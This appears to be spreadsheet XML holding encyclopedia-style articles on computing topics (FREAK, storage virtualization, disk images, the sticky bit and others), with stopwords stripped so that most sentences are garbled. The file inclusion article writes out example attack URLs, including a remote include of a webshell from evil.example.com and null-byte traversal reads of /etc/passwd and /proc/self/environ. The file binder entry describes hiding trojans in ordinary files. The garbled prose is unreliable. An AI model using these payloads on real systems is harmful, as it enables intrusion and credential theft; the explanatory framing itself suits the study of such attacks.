software would flaw. march 2015, apple released security updates operating systems fixed flaw. march 2015, microsoft released patch fixed vulnerability supported versions windows (server 2003, vista later). google chrome opera also mitigated flaw. mozilla firefox vulnerable flaw.the research paper explaining flaw published 36th ieee symposium security privacy awarded distinguished paper award. also beast (computer security) breach (security exploit) crime (security exploit) logjam (computer security) poodle server-gated cryptography references external links https://www.smacktls.com/ https://web.archive.org/web/20150304002021/https://freakattack.com/ https://tools.keycdn.com/freak/ https://infogr.am/https_sites_that_support_rsa_export_suites http://www.sitemeer.com/</t>
  </si>
  <si>
    <t>Domain controller</t>
  </si>
  <si>
    <t>domain controller (dc) server computer responds security authentication requests within computer network domain. network server responsible allowing host access domain resources. authenticates users, stores user account information enforces security policy domain. commonly implemented microsoft windows environments (see domain controller (windows)), centerpiece windows active directory service. however, non-windows domain controllers established identity management software samba freeipa. software software operating system used domain controller usually consists several components shared across platforms. this includes operating system (usually windows server linux), ldap service (red directory server, etc.), network time service (ntpd, chrony, etc.), computer network authentication protocol (usually kerberos). other components, public infrastructure (active directory certificate services, dogtag, openssl) service domain name system (windows bind) also included server another domain-joined server. implementation domain controllers typically deployed cluster ensure high-availability maximize reliability. windows environment, domain controller serves primary domain controller (pdc) servers promoted domain controller status domain server backup domain controller (bdc). unix-based environments, machine serves master domain controller others serve replica domain controllers, periodically replicating database information main domain controller storing read-only format. also apple open directory domain controller (windows) microsoft windows active directory identity manager/red freeipa samba univention corporate server list ldap software references</t>
  </si>
  <si>
    <t>FORK-256</t>
  </si>
  <si>
    <t>fork-256 hash algorithm designed response security issues discovered earlier sha-1 algorithms. after substantial cryptanalysis, algorithm considered broken. background 2005, xiaoyun wang announced order- {\displaystyle 2^{63}} collision attack government's hash standard sha-1. national institute standards technology (nist), body responsible setting cryptographic standards united states, concluded practical attack previous estimates order- {\displaystyle 2^{80}} began encouraging additional research hash functions weaknesses. part effort, nist hosted workshops potential algorithms, including fork-256, introduced discussed. rather immediately select algorithms, nist conducted public competition 2007–2012 ultimately resulted keccak algorithm selected sha-3 standard. algorithm analysis fork-256 introduced 2005 nist hash workshop published following year. fork-256 uses 512-bit blocks implements preset constants change repetition. each block hashed 256-bit block four branches divides block sixteen 32-bit words encrypted rearranged. initial algorithm garnered significant cryptanalysis, summarized (saarinen 2007). matusiewicz (2006) discovered collision attack complexity 126.6 {\displaystyle 2^{126.6}} mendel (2006) independently derived similar attack. following year matusiewicz's team improved attack worse {\displaystyle 2^{108},} (contini 2007) demonstrated practical implementation attack.in response attacks, hong team proposed improved version fork-256. markku-juhani saarinen derived 112.9 {\displaystyle 2^{112.9}} -complexity attack improved algorithm. comparison, eventual sha-3 standard withstands order- {\displaystyle 2^{128}} attack. deployment fork-256 added botan cryptographic library introduction. botan developer jack lloyd removed algorithm 2010 concluding hash suffered several weaknesses never become widely used. references</t>
  </si>
  <si>
    <t>Doas</t>
  </si>
  <si>
    <t>doas (“dedicated openbsd application subexecutor”) program execute commands another user. system administrator configure give specified users privileges execute specified commands. free open-source license available unix unix-like operating systems. doas developed unangst openbsd simpler safer sudo replacement. unangst issues default sudo config, motivation develop doas.doas originally developed unangst released openbsd october 2015 replacing sudo. however, openbsd still provides sudo package. configuration definition privileges written configuration file, /etc/doas.conf. syntax used configuration file inspired packet filter configuration file. examples allow user1 execute procmap root without password: permit nopass user1 root /usr/sbin/procmap allow members wheel group command root: permit :wheel root simpler version (only works default user root (after install is)): permit :wheel allow members wheel group command (default root) remember entered password: permit persist :wheel ports availability jesse smith’s port doas packaged dragonflybsd, freebsd, netbsd. according author, also works illumos macos. opendoas, linux port, packaged debian, alpine, arch, crux, fedora, gentoo, guix, hyperbola, manjaro, parabola, nixos, ubuntu, void linux. also sudo runas references</t>
  </si>
  <si>
    <t>Fatal exception error</t>
  </si>
  <si>
    <t>Fatal system error</t>
  </si>
  <si>
    <t>fatal system error (also known system crash, stop error, kernel error, check) occurs operating system halts, reached condition longer operate safely (i.e. critical data could lost system damaged ways). microsoft windows, fatal system error deliberately caused kernel-mode driver either kebugcheck kebugcheckex function. however, done last option critical driver corrupted impossible recover. this design parallels openvms. unix kernel panic concept similar. windows when check issued, crash dump file created system configured create them. this file contains "snapshot" useful low-level information system used debug root cause problem possibly things background. user enabled system also write entry system event log. entry contains information check (including check code parameters) well link report provide user prescriptive suggestions cause check definitive well-known. next, kernel debugger connected active check occurs, system break debugger cause crash investigated. debugger attached, blue text screen displayed contains information error occurred, commonly known blue screen check screen. user blue screen system configured automatically restart (which became default setting windows sp2). otherwise, appears though system simply rebooted (though blue screen visible briefly). windows, checks supported windows kernel. corresponding system routine windows named shell_sysmodal_message, halt system like checks instead, displays infamous bsod (blue screen death) allows user attempt continue. windows windbg documentation reference information checks. windbg package available free download installed users. windows larger complicated install. also screen death references external links debugging tools windows check code reference microsoft docs</t>
  </si>
  <si>
    <t>Storage virtualization</t>
  </si>
  <si>
    <t>computer science, storage virtualization "the process presenting logical view physical storage resources host computer system, "treating storage media (hard disk, optical disk, tape, etc.) enterprise single pool storage."a "storage system" also known storage array, disk array, filer. storage systems typically special hardware software along disk drives order provide fast reliable storage computing data processing. storage systems complex, thought special purpose computer designed provide storage capacity along advanced data protection features. disk drives element within storage system, along hardware special purpose embedded software within system. storage systems provide either block accessed storage, file accessed storage. block access typically delivered fibre channel, iscsi, sas, ficon protocols. file access often provided using protocols. within context storage system, primary types virtualization occur: block virtualization used context refers abstraction (separation) logical storage (partition) physical storage accessed without regard physical storage heterogeneous structure. this separation allows administrators storage system greater flexibility manage storage users. file virtualization addresses challenges eliminating dependencies data accessed file level location files physically stored. this provides opportunities optimize storage server consolidation perform non-disruptive file migrations. block virtualization address space remapping virtualization storage helps achieve location independence abstracting physical location data. virtualization system presents user logical space data storage handles process mapping actual physical location. possible multiple layers virtualization mapping. possible output layer virtualization used input higher layer virtualization. virtualization maps space back-end resources, front-end resources. instance, "back-end" refers logical unit number (lun) presented computer, host system direct use. "front-end" volume presented host computer system use. actual form mapping depend chosen implementation. some implementations limit granularity mapping limit capabilities device. typical granularities range single physical disk small subset (multiples megabytes gigabytes) physical disk. block-based storage environment, single block information addressed using identifier offset within known logical block addressing (lba). metadata virtualization software device responsible maintaining consistent view mapping information virtualized storage. this mapping information often called metadata stored mapping table. address space limited capacity needed maintain mapping table. level granularity, total addressable space directly impact size meta-data, hence mapping table. reason, common trade-offs, amount addressable capacity granularity access granularity. common method address limits multiple levels virtualization. several storage systems deployed today, common utilize three layers virtualization.some implementations mapping table, instead calculate locations using algorithm. these implementations utilize dynamic methods calculate location access, rather storing information mapping table. redirection virtualization software device uses metadata re-direct requests. receive incoming request containing information location data terms logical disk (vdisk) translates request physical disk location. example, virtualization device receive read request vdisk id=1, lba=32 perform meta-data look id=1, lba=32, finds maps physical id=7, lba0 sends read request physical id=7, lba0 receives data back physical sends data back originator come vdisk id=1, lba32 capabilities most implementations allow heterogeneous management multi-vendor storage devices within scope given implementation's support matrix. this means following capabilities limited single vendor's device similar capabilities provided specific storage controllers) fact possible across different vendors' devices. replication data replication techniques limited virtualization appliances described detail. however implementations provide replication services. when storage virtualized, replication services must implemented software device performing virtualization. this true virtualization layer true consistent image logical disk (vdisk) copied. this limits services implementations implement makes seriously difficult implement. virtualization implemented network higher, renders replication services provided underlying storage controllers useless. remote data replication disaster recovery synchronous mirroring completion returned remote site acknowledges completion. applicable shorter distances (&lt;200 asynchronous mirroring completion returned remote site acknowledged completion. applicable much greater distances (&gt;200 point-in-time snapshots copy clone data diverse uses when combined thin provisioning, enables space-efficient snapshots pooling physical storage resources aggregated storage pools, logical storage created. more storage systems, heterogeneous nature, added needed, virtual storage space scale amount. this process fully transparent applications using storage infrastructure. disk management software device providing storage virtualization becomes common disk manager virtualized environment. logical disks (vdisks) created virtualization software device mapped (made visible) required host server, thus providing common place managing volumes environment. enhanced features easy provide environment: thin provisioning maximize storage utilization this relatively easy implement physical storage allocated mapping table used. disk expansion shrinking more physical storage allocated adding mapping table (assuming using system cope online expansion) similarly disks reduced size removing physical storage mapping (uses limited guarantee resides areas removed) benefits non-disruptive data migration major benefits abstracting host server actual storage ability migrate data maintaining concurrent access. host knows logical disk (the mapped lun) changes meta-data mapping transparent host. this means actual data moved replicated another physical location without affecting operation client. when data copied moved, meta-data simply updated point location, therefore freeing physical storage location. process moving physical location known data migration. most implementations allow done non-disruptive manner, concurrently host continues perform logical disk lun). mapping granularity dictates quickly meta-data updated, much extra capacity required migration, quickly previous location marked free. smaller granularity faster update, less space required quicker storage freed there many tasks storage administrator perform simply concurrently performed using data migration techniques. moving data over-utilized storage device. moving data onto faster storage device needs require implementing information lifecycle management policy migrating data older storage devices (either scrapped off-lease) improved utilization utilization increased virtue pooling, migration, thin provisioning services. this allows users avoid over-buying over-provisioning storage solutions. words, kind utilization shared pool storage easily quickly allocated needed avoid constraints storage capacity often hinder application performance.when available storage capacity pooled, system administrators longer search disks free space allocate particular host server. logical disk simply allocated available pool, existing disk expanded. pooling also means available storage capacity potentially used. traditional environment, entire disk would mapped host. this larger required, thus wasting space. virtual environment, logical disk (lun) assigned capacity required using host. storage assigned needed point time, reducing need guess much given host need future. using thin provisioning, administrator create large thin provisioned logical disk, thus using system thinks large disk one. fewer points management with storage virtualization, multiple independent storage devices, even scattered across network, appear single monolithic storage device managed centrally. however, traditional storage controller management still required. that creation maintenance raid arrays, including error fault management. risks backing failed implementation once abstraction layer place, virtualizer knows data actually resides physical medium. backing virtual storage environment therefore requires reconstruction logical disks contiguous disks used traditional manner. most implementations provide form back-out procedure data migration services least possible, time consuming. interoperability vendor support interoperability enabler virtualization software device. applies actual physical storage controllers hosts, operating systems, multi-pathing software connectivity hardware. interoperability requirements differ based implementation chosen. example, virtualization implemented within storage controller adds extra overhead host based interoperability, require additional support storage controllers virtualized software. switch based virtualization require specific host interoperability uses packet cracking techniques redirect i/o. network based appliances highest level interoperability requirements interoperate devices, storage hosts. complexity complexity affects several areas management environment: although virtual storage infrastructure benefits single point logical disk replication service management, physical storage must still managed. problem determination fault isolation also become complex, abstraction layer. infrastructure design: traditional design ethics longer apply, virtualization brings whole range ideas concepts think detailed here) software device itself: some implementations complex design code network based, especially in-band (symmetric) designs particular implementations actually handle requests latency becomes issue. metadata management information valuable assets today's business environments. once virtualized, metadata glue middle. metadata lost, actual data would virtually impossible reconstruct logical drives without mapping information. implementation must ensure protection appropriate levels back-ups replicas. important able reconstruct meta-data event catastrophic failure. metadata management also implications performance. virtualization software device must able keep copies metadata atomic quickly updateable. some implementations restrict ability provide certain fast update functions, point-in-time copies caching super fast updates required ensure minimal latency actual performed. performance scalability implementations performance physical storage actually improved, mainly caching. caching however requires visibility data contained within request limited in-band symmetric virtualization software devices. however implementations also directly influence latency request (cache miss), flow software device. assuming software device efficiently designed impact minimal compared latency associated physical disk accesses. nature virtualization, mapping logical physical requires processing power lookup tables. therefore, every implementation small amount latency. addition response time concerns, throughput considered. bandwidth meta-data lookup software directly impacts available system bandwidth. asymmetric implementations, meta-data lookup occurs information read written, bandwidth less concern meta-data tiny fraction actual size. in-band, symmetric flow designs directly limited processing power connectivity bandwidths. most implementations provide form scale-out model, inclusion additional software device instances provides increased scalability potentially increased bandwidth. performance scalability characteristics directly influenced chosen implementation. implementation approaches host-based storage device-based network-based host-based host-based virtualization requires additional software running host, privileged task process. cases volume management built operating system, instances offered separate product. volumes (lun's) presented host system handled traditional physical device driver. however, software layer (the volume manager) resides disk device driver intercepts requests, provides meta-data lookup mapping. most modern operating systems form logical volume management built-in linux called logical volume manager lvm; solaris freebsd, zfs's zpool layer; windows called logical disk manager ldm), performs virtualization tasks. note: host based volume managers long term storage virtualization coined. pros simple design code supports storage type improves storage utilization without thin provisioning restrictions cons storage utilization optimized host basis replication data migration possible locally host software unique operating system easy keeping host instances sync instances traditional data recovery following server disk drive crash impossible specific examples technologies: logical volume management file systems, e.g., (hard links, smb/nfs) automatic mounting, e.g., (autofs) storage device-based like host-based virtualization, several categories existed years recently classified virtualization. simple data storage devices, like single hard disk drives, provide virtualization. even simplest disk arrays provide logical physical abstraction, raid schemes join multiple disks single array (and possibly later divide array smaller volumes). advanced disk arrays often feature cloning, snapshots remote replication. generally devices provide benefits data migration replication across heterogeneous storage, vendor tends proprietary protocols. breed disk array controllers allows downstream attachment storage devices. purposes article discuss later style actually virtualize storage devices. concept primary storage controller provides services allows direct attachment storage controllers. depending implementation different vendors. primary controller provide pooling meta-data management services. also provide replication migration services across controllers pros additional hardware infrastructure requirements provides benefits storage virtualization does latency individual i/os cons storage utilization optimized across connected controllers replication data migration possible across connected controllers vendors device long distance support downstream controller attachment limited vendors support matrix latency, cache hits require primary storage controller issue secondary downstream request increase storage infrastructure resource, primary storage controller requires bandwidth secondary storage controllers maintain throughput network-based storage virtualization operating network based device (typically standard server smart switch) using iscsi fibre channel networks connect san. these types devices commonly available implemented form virtualization. virtualization device sits provides layer abstraction hosts performing storage controllers providing storage capacity. pros true heterogeneous storage virtualization caching data (performance benefit) possible in-band single management interface virtualized storage replication services across heterogeneous devices cons complex interoperability matrices limited vendors support difficult implement fast meta-data updates switched-based devices out-of-band requires specific host based software in-band latency in-band complicated design code appliance-based switch-based there commonly available implementations network-based storage virtualization, appliance-based switch-based. both models provide services, disk management, metadata lookup, data migration replication. both models also require processing hardware provide services. appliance based devices dedicated hardware devices provide connectivity form another. these hosts storage case in-band (symmetric) appliances provide benefits services discussed article. requests targeted appliance itself, performs meta-data mapping redirecting sending request underlying storage. in-band appliance also provide caching data, implementations provide form clustering individual appliances maintain atomic view metadata well cache data. switch based devices, name suggests, reside physical switch hardware used connect devices. these also hosts storage different techniques provide metadata mapping, packet cracking snoop incoming requests perform redirection. much difficult ensure atomic updates metadata switched environment services requiring fast updates data metadata limited switched implementations. in-band out-of-band in-band, also known symmetric, virtualization devices actually data path host storage. requests data pass device. hosts perform virtualization device never interact actual storage device. virtualization device turn performs storage device. caching data, statistics data usage, replications services, data migration thin provisioning easily implemented in-band device. out-of-band, also known asymmetric, virtualization devices sometimes called meta-data servers. these devices perform meta-data mapping functions. this requires additional software host knows first request location actual data. therefore, request host intercepted leaves host, meta-data lookup requested meta-data server (this interface san) returns physical location data host. information retrieved actual request storage. caching possible data never passes device. file based virtualization file-based virtualization type storage virtualization uses files basic unit storage. this contrast block-based storage virtualization, uses blocks basic unit. abstract away physical details storage allow files stored type storage device, without need specific drivers low-level configuration. file-based virtualization used variety purposes, including storage consolidation, improved storage utilization, disaster recovery. this simplify storage administration reduce overall number storage devices need managed. file-based virtualization also improve storage utilization allowing files stored devices used full capacity. example, file server number hard drives partially filled, file-based virtualization used store files drives, thereby increasing utilization storage devices. finally, file-based virtualization used disaster recovery purposes. replicating files across variety storage devices, possible recover case storage device failure. file-based virtualization used create virtual file server virtual device), storage system appears user single file server actually implemented files stored number physical file servers. also archive automated tiered storage storage hypervisor backup computer data storage data proliferation disk storage information lifecycle management information repository magnetic tape data storage repository spindle references</t>
  </si>
  <si>
    <t>File synchronization</t>
  </si>
  <si>
    <t>file synchronization syncing) computing process ensuring computer files locations updated certain rules. one-way file synchronization, also called mirroring, updated files copied source location target locations, files copied back source location. two-way file synchronization, updated files copied directions, usually purpose keeping locations identical other. article, term synchronization refers exclusively two-way file synchronization. file synchronization commonly used home backups external hard drives updating transport flash drives. bittorrent sync, dropbox skysite prominent products. some backup software also support real-time file sync. automatic process prevents copying already identical files thus faster save much time versus manual copy, less error prone. however suffers limit synchronized files must physically portable storage device. synchronization software keeps list files changed files eliminates problem (e.g. "snapshot" feature beyond compare "package" feature synchronize it!). especially useful mobile workers, others work multiple computers. possible synchronize multiple locations synchronizing pair time. unison manual describes this: need this, reliable things organize machines "star topology," machine designated "hub" rest "spokes," spoke machine synchronizing hub. advantage star topology eliminates possibility confusing "spurious conflicts" arising fact separate archive maintained unison every pair hosts synchronizes. common features common features file synchronization systems include: encryption security, especially synchronizing across internet. compressing data sent across network. conflict detection file modified sources, opposed modified one. undetected conflicts lead overwriting copies file recent version, causing data loss. conflict detection, synchronization software needs keep database synchronized files. distributed conflict detection achieved version vectors. open files support ensures data integrity copying data application files in-use database files exclusively locked. specific support using intermediate storage device, removable flash disc, synchronize machines. most synchronizing programs used way, providing specific support reduce amount data stored device. ability preview changes made. ability view differences individual files. backup operating systems transfer network computers. ability edit files multiple computers operating systems. possible security concerns consumer-grade file synchronization solutions popular, however business use, create concern allowing corporate information sprawl unmanaged devices cloud services uncontrolled organization. also comparison file synchronization software comparison online backup services data synchronization data comparison mirror (computing) backup software list backup software remote backup service shared file access references</t>
  </si>
  <si>
    <t>Disk image emulators</t>
  </si>
  <si>
    <t>disk image, computing, computer file containing contents structure disk volume entire data storage device, hard disk drive, tape drive, floppy disk, optical disc, flash drive. disk image usually made creating sector-by-sector copy source medium, thereby perfectly replicating structure contents storage device independent file system. depending disk image format, disk image span computer files. file format open standard, image format optical disc images, disk image unique particular software application. size disk image large contains contents entire disk. reduce storage requirements, imaging utility filesystem-aware omit copying unused space, compress used space. history disk images originally late 1960s) used backup disk cloning mainframe disk media. early ones small megabytes large megabytes, copy medium magnetic tape, large megabytes reel. disk images became much popular floppy disk media became popular, replication storage exact structure necessary efficient, especially case copy protected floppy disks. uses disk images used duplication optical media including dvds, blu-ray discs, etc. also used make perfect clones hard disks. virtual disk emulate type physical drive, hard disk drive, tape drive, drive, floppy drive, cd/dvd/bd/hd dvd, network share among others; course, since physical, requires virtual reader device matched (see below). emulated drive typically created either fast read/write access (known disk), hard drive. typical uses virtual drives include mounting disk images dvds, mounting virtual hard disks purpose on-the-fly disk encryption ("otfe"). some operating systems linux macos virtual drive functionality built-in (such loop device), others older versions microsoft windows require additional software. starting windows windows includes native virtual drive functionality.virtual drives typically read-only, used mount existing disk images modifiable drive. however software provides virtual cd/dvd drives produce disk images; type virtual drive goes variety names, including "virtual burner". enhancement using disk images virtual drive allows users shift data technologies, example optical drive hard disk drive. this provide advantages speed noise (hard disk drives typically four five times faster optical drives, quieter, suffer less wear tear, case solid-state drives, immune physical trauma). addition reduce power consumption, since allow device hard disk) used instead (hard disk plus optical drive). virtual drives also used part emulation entire machine virtual machine). software distribution since spread broadband, images become common medium linux distributions. applications macos often delivered online apple disk image containing file system includes application, documentation application, online data bootable recovery images provided customers certain commercial software companies. disk images also used distribute software across company network, portability (many cd/dvd images stored hard disk drive). there several types software allow software distributed large numbers networked machines little disruption user. some even scheduled update night machines disturbed business hours. these technologies reduce end-user impact greatly reduce time man-power needed ensure secure corporate environment. efficiency also increased much less opportunity human error. disk images also needed transfer software machines without compatible physical disk drive. computers running macos, disk images common file type used software downloads, typically downloaded browser. images typically compressed apple disk image (.dmg suffix) files. they usually opened directly mounting without using real disk. advantage compared technologies, archives, need redundant drive space unarchived data. software packages windows also sometimes distributed disk images including images. while windows versions prior windows natively support mounting disk images files system, several software options available this; comparison disc image software. security virtual hard disks often used on-the-fly disk encryption ("otfe") software freeotfe truecrypt, encrypted "image" disk stored computer. when disk's password entered, disk image "mounted", made available volume computer. files written virtual drive written encrypted image, never stored cleartext. process making computer disk available called "mounting", process removing called "dismounting" "unmounting"; terms used making encrypted disk available unavailable. virtualization hard disk drive solid-state drive virtual machine implemented disk image, stored either collection flat files, collectively called split flat file, typically size, single, large monolithic flat file. disk image formats include format used microsoft's hyper-v, format used oracle corporation's virtualbox, vmdk format used vmware virtual machines, qcow format used qemu. forensic imaging forensic imaging process involves copying contents recording image entire drives contents (imaging) single file small number files). component forensic imaging involves verification values imaged ensure integrity file(s) imaged. forensic images created using software tools acquired. some tools added forensic functionality previously mentioned; typically used replicate contents hard drive another system. this typically done software programs structure files themselves. forensic images typically acquired using software tools compatible system. note forensic imaging software tools limitations terms software's ability communicate, diagnose, repair storage mediums (often times) experiencing errors even failure internal component. data recovery data recovery imaging process imaging sector, systematically, source drive another destination storage medium required files retrieved. data recovery situations, cannot always rely integrity particular file structure therefore complete sector copy mandatory imaging though. system backup some backup programs back user files; boot information files locked operating system, time backup, saved operating systems. disk image contains files, faithfully replicating data, including file attributes file fragmentation state. reason, also used backing optical media (cds dvds, etc.), allows exact efficient recovery experimenting modifications system virtual machine, there benefits drawbacks "file-based" "bit-identical" image backup methods. files belong installed programs usually backed file-based backup software, preferred file-based backup usually saves time space never copy unused space bit-identical image does), usually capable incremental backups, generally flexibility. files installed programs, file-based backup solutions fail reproduce necessary characteristics, particularly windows systems. example, windows certain registry keys short filenames, sometimes reproduced file-based backup, commercial software uses copy protection cause problems file moved different disk sector, file-based backups always reproduce metadata security attributes. creating bit-identical disk image ensure system backup exactly original. bit-identical images made linux available nearly live cds. most commercial imaging software "user-friendly" "automatic" create bit-identical images. these programs advantages, except allow restoring partitions different size file-allocation size, thus files exact sector. additionally, support windows vista, slightly move realign partitions thus make vista unbootable (see windows vista startup process). rapid deployment clone systems large enterprises often need replace computer systems large numbers. installing operating system programs requires time effort significant possibility human error. therefore, system administrators disk imaging quickly clone fully prepared software environment reference system. this method saves time effort allows administrators focus systems unique idiosyncrasies must bear. there several types disk imaging software available single instancing technology reduce time, bandwidth, storage required capture archive disk images. this makes possible rebuild transfer information-rich disk images lightning speeds, significant improvement days programmers spent hours configuring machine within organization. legacy hardware emulation emulators frequently disk images simulate floppy drive computer emulated. this usually simpler program accessing real floppy drive (particularly disks format supported host operating system), allows large library software managed. copy protection circumvention mini image optical disc image file format fakes disk's content bypass cd/dvd copy protection. because full size original disk, mini images stored instead. mini images small, order kilobytes, contain information necessary bypass cd-checks. therefore; mini image form no-cd crack, unlicensed games, legally backed games. mini images contain real data image file, code needed satisfy cd-check. they cannot provide backed data computer program on-disk image video files. creation creating disk image achieved suitable program. different disk imaging programs varying capabilities, focus hard drive imaging (including hard drive backup, restore rollout), optical media imaging (cd/dvd images). virtual disk writer virtual burner computer program emulates actual disc authoring device writer writer. instead writing data actual disc, creates virtual disk image. virtual burner, definition, appears disc drive system writing capabilities opposed conventional disc authoring programs create virtual disk images), thus allowing software burn discs create virtual discs. file formats (file format) utilities rawwrite winimage examples floppy disk image file writer/creator ms-dos microsoft windows. they used create image files floppy disk, write image files floppy. unix similar systems program used create disk images, write particular disk. also possible mount access block level using loop device. apple disk copy used classic macos systems create write disk image files. authoring software cds/dvds nero burning generate load disk images optical media. also boot image card image comparison disc image software disk cloning torito (cd-rom standard) image, archive file optical media volume loop device mtools no-cd crack protected area time interface extension services (parties) image software cracking references external links software repository including rawrite2</t>
  </si>
  <si>
    <t>File inclusion vulnerability</t>
  </si>
  <si>
    <t>file inclusion vulnerability type vulnerability commonly found affect applications rely scripting time. this issue caused application builds path executable code using attacker-controlled variable allows attacker control file executed time. file include vulnerability distinct generic directory traversal attack, directory traversal gaining unauthorized file system access, file inclusion vulnerability subverts application loads code execution. successful exploitation file inclusion vulnerability result remote code execution server runs affected application. attacker remote code execution create shell server, used website defacement. types inclusion remote file inclusion remote file inclusion (rfi) occurs application downloads executes remote file. these remote files usually obtained form http user-supplied parameter application. local file inclusion local file inclusion (lfi) similar remote file inclusion vulnerability except instead including remote files, local files i.e. files current server included execution. this issue still lead remote code execution including file contains attacker-controlled data server's access logs. programming languages main cause unvalidated user-input filesystem function includes file execution. most notable include require statements. most vulnerabilities attributed novice programmers familiar capabilities programming language. language directive which, enabled, allows filesystem functions retrieve data remote locations. directive allow_url_fopen versions 4.3.4 allow_url_include since 5.2.0. directive disabled default, prior versions enabled default. exploit vulnerability attacker alter variable passed functions cause include malicious code remote resource. mitigate vulnerability user input needs validated used. example consider script includes file specified request: developer intended read english.php french.php, alter application's behavior display language user's choice. possible inject another path using language parameter. /vulnerable.php?language=http://evil.example.com/webshell.txt? injects remotely hosted file containing malicious code (remote file include) /vulnerable.php?language=c:\\ftp\\upload\\exploit executes code already uploaded file called exploit.php (local file inclusion vulnerability) /vulnerable.php?language=c:\\notes.txt%00 example using null meta character remove .php suffix, allowing access files .php. this null byte injection patched 5.3, longer used lfi/rfi attacks. /vulnerable.php?language=../../../../../etc/passwd%00 allows attacker read contents /etc/passwd file unix-like system directory traversal attack. /vulnerable.php?language=../../../../../proc/self/environ%00 allows attacker read contents /proc/self/environ file unix-like system directory traversal attack. attacker modify http header (such user-agent) attack code exploit remote code execution.the best solution case whitelist accepted language parameters. strong method input validation whitelist cannot used, rely upon input filtering validation passed-in path make sure contain unintended characters character patterns. however, require anticipating possible problematic character combinations. safer solution predefined switch/case statement determine file include rather form parameter dynamically generate path. javaserver pages (jsp) javaserver pages (jsp) scripting language include files execution runtime. example following script vulnerable file inclusion vulnerability: /vulnerable.jsp?p=../../../../var/log/access.log%00 unlike php, still affected null byte injection, param execute commands found server's access log. server side includes (ssi) server side include uncommon typically enabled default server. server-side include used gain remote code execution vulnerable server. example following code vulnerable remote-file inclusion vulnerability: code vulnerability, rather including file executed server. also attack (computing) code injection metasploit project, open-source penetration testing tool includes tests injection threat (computer) w3af, open-source application security scanner default credential vulnerability references external links remote file inclusion application security consortium local file inclusion local remove file inclusion wordpress hacked help</t>
  </si>
  <si>
    <t>Disk image</t>
  </si>
  <si>
    <t>File binder</t>
  </si>
  <si>
    <t>file binders utility software allow user "bind" multiple files together resulting single executable. they commonly used hackers insert programs trojan horses otherwise harmless files, making difficult detect. malware builders (such keyloggers stealers) often include binder default.a polymorphic packer file binder polymorphic engine. thus ability make payload mutate time, difficult detect remove. also dendroid (malware) minipanzer megapanzer trojan horses used file binders distribution potentially unwanted program sometimes used file binders distribution references external links minipanzer source code sourceforge</t>
  </si>
  <si>
    <t>Sticky bit</t>
  </si>
  <si>
    <t>computing, sticky user ownership access right flag assigned files directories unix-like systems. there definitions: files, directories. files, particularly executables, superuser could retained main memory, even need ends, minimize swapping would occur another need arises, file reloaded relatively slow secondary memory. this function become obsolete swapping optimization. directories, directory's sticky set, filesystem treats files directories special file's owner, directory's owner, root user rename delete file. without sticky set, user write execute permissions directory rename delete contained files, regardless file's owner. typically /tmp directory prevent ordinary users deleting moving users' files. modern function sticky refers directories, protects directories content hijacked non-owners; found modern unix-like systems. files shared directory /tmp belong individual owners, non-owners delete, overwrite rename them. history sticky introduced fifth edition unix 1974) pure executable files. when set, instructed operating system retain text segment program swap space process exited. this speeds subsequent executions allowing kernel make single operation moving program swap real memory. thus, frequently-used programs like editors would load noticeably faster. notable problem "stickied" programs replacing executable (for instance, patching); required removing sticky executable, executing program exiting flush cache, replacing binary executable, restoring sticky bit. subsequently behavior became operative hp-ux unixware. solaris appears abandoned 2005. 4.4-lite release retained sticky behavior, subsequently dropped openbsd release 3.7) freebsd release 2.2.1). version linux ever supported traditional behavior; linux performs caching executable files files, re-executing program flush cache necessary. usage common sticky directories residing within filesystems unix-like operating systems. when directory's sticky set, filesystem treats files directories special file's owner, directory's owner, root rename delete file. without sticky set, user write execute permissions directory rename delete contained files, regardless file's owner. typically, /tmp directory prevent ordinary users deleting moving users' files. this feature introduced 4.3bsd 1986, today found modern unix-like systems. addition, solaris solaris 2.5) defines special behavior sticky non-executable files: files, accessed, cached kernel. this usually swap files prevent access file flushing important data system cache. also used occasionally benchmarking tests.the sticky also automounter indicate file mounted yet. this allows programs like ignore unmounted remote files. examples sticky using chmod command using octal mode 1000 symbol already used setuid bit). example, directory /usr/local/tmp, would type chmod /usr/local/tmp. make sure directory standard permissions, could also type chmod 1777 /usr/local/tmp. clear chmod /usr/local/tmp chmod 0777 /usr/local/tmp (the latter also reset directory standard permissions). unix symbolic file system permission notation, sticky represented either letter final character-place depending whether execution others category unset, respectively. instance, solaris /tmp directory, default others execute sticky-bit set, shows sticky-bit file directory without execution others category (non-user-owner non-group-owner), indicated capital (replacing would otherwise also chmod setuid references external links unix file directory permissions, 2010, wayne pollock, archived original february 2012</t>
  </si>
  <si>
    <t>Disk magazine</t>
  </si>
  <si>
    <t>disk magazine, colloquially known diskmag diskzine, magazine distributed electronic form read using computers. these popularity 1980s 1990s periodicals distributed floppy disk, hence name. rise internet late 1990s caused superseded almost entirely online publications, sometimes still called "diskmags" despite lack physical disks. defining characteristics unique defining characteristic diskmag contrast typical ascii "zine" "t-file" even "g-file") diskmag usually comes housed executable program file specific hardware platform. diskmag tends aesthetically appealing custom graphical user interface even interfaces), background music features take advantage hardware platform diskmag coded for. diskmags written many platforms, ranging even created video game consoles, like scenedicate dreamcast. history precursors early home hobby users personal computers late 1970s early 1980s sometimes typed programs, usually basic language, published computer magazines time. this work, prone error, idea publishing magazine directly computer-readable medium programs could directly without typing came independently several people. some ideas putting codes paper magazines, could read computer appropriate peripheral, floated time, never caught since common data storage medium earliest home computers audio cassette, first magazine published physical computer medium actually cassette magazine rather disk magazine; cload magazine, radio shack trs-80 computer, began publication 1978, named command load program cassette computer system. cload first electronic periodical, however, various arpanet digests published text files sent around network since early 1970s. these, however, pure ascii text hence diskmags current definition. also, time, people outside academic institutions access forerunner internet. 1980s september, 1981, first issue softdisk published apple computers; coming monthly diskette, first floppy-disk-based periodical. this first publication company also known softdisk would later bring similar publications commodore apple macintosh. magazines, commodore called loadstar, continued publishing issue 2007 making longest running disk software magazine history. other publishers produced variety competing publications, including diskazine, window, i.b.magazette, uptime, life. atari 1986, first disk magazine shape news. this english-language on-disk magazine netherlands. some publishers paper magazines published disk companions, either polybagged magazines form so-called covermounts) available separate subscriptions. 1990s early 1990s, software founders john carmack john romero earliest works published disk magazines working softdisk. short-lived game subscription called gamer's edge published side-scrolling games written team would later create commander keen doom. mid-1990s, cd-roms taking floppy disks major data storage transfer medium. some existing disk magazines switched format others, digital culture stream, founded cd-based magazines start. higher capacity format, along faster speed newer computers, allowed disk magazines provide multimedia experience, including music animation. such things movie trailers music samples could provided, allowing disk magazine target fans entertainment industry rather computer hobbyists earlier times. many disk magazines 1990s later connected demoscene, including grapevine, amiga computer. demoscene diskmags known cross closely neighboring underground computer 